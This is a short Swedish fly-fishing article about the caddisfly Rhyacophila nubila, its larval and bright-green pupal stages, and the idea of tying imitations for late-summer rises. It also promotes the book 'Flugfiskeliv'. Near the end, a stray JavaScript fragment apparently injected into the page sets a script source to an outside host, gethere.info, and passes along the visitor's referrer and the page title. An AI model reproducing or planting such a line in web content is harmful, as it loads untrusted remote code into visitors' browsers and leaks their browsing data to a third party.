Vakfest i sensommartid – förbered dig nu

Den rovlevande nattsländelarven av Rhyacophila nubila.

Den rovlevande nattsländelarven av Rhyacophila nubila.

När denna nattsländelarv förvandlas till slända, kan den under varma augustinätter ge upphov till pluppande vakfester. Varför inte plocka fram städet och förbereda dig inför sommaren?
Det är långt till sommaren, men redan nu kan du  börja förbreda dig. Bilden visar nattsländan Rhyacophila nubila i sitt larvstadium, när den på botten kryper omkring på jakt efter andra bottendjur.

När den förpuppas blir den klargrön. De simmar då upp mot ytan och kläcker fritt, direkt från vattnet. Kanske värt att plocka fram städet och försöka imitera denna nattslända i sina olika stadier?
Bilden kommer från Ingemar Näslunds och Lars Häreblads bok ”Flugfiskeliv”,
Boken hittar du på waterlife. Prenumeranter på Allt om Flugfiske har 25 % rabatt.

I puppstadiet blir Ryacophila nubila klargrön.

I puppstadiet blir Ryacophila nubila klargrön.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;


MER FRÅN ALLTOMFLUGFISKE.SE

Sponsrad
Sponsrad